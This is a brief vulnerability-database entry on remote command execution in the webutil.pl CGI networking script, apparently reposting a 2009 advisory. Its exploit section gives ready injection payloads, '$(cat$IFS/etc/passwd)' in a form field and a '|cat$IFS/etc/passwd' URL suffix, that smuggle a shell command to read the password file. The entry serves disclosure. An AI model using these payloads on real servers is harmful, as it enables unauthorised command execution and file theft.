webutil.pl is still vulnerable against Remote Command Execution.

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052090 漏洞类型
发布时间 2009-04-01 更新时间 2009-04-01
CVE编号 CVE-2008-6555
CVE-2008-6556
CVE-2008-6557
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009040094
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Webutil is a collection of networking tools by "The Puppet Master".

Access the following url and type in the form field "$(cat$IFS/etc/passwd)":

http://server/cgi-bin/webutil.pl?dig

http://server/cgi-bin/webutil.pl?whois (Version 2.3 only)

Type in the following url (Version 2.7 only):

http://server/cgi-bin/webutil.pl?details&|cat$IFS/etc/passwd

<< Greetz Zero X >>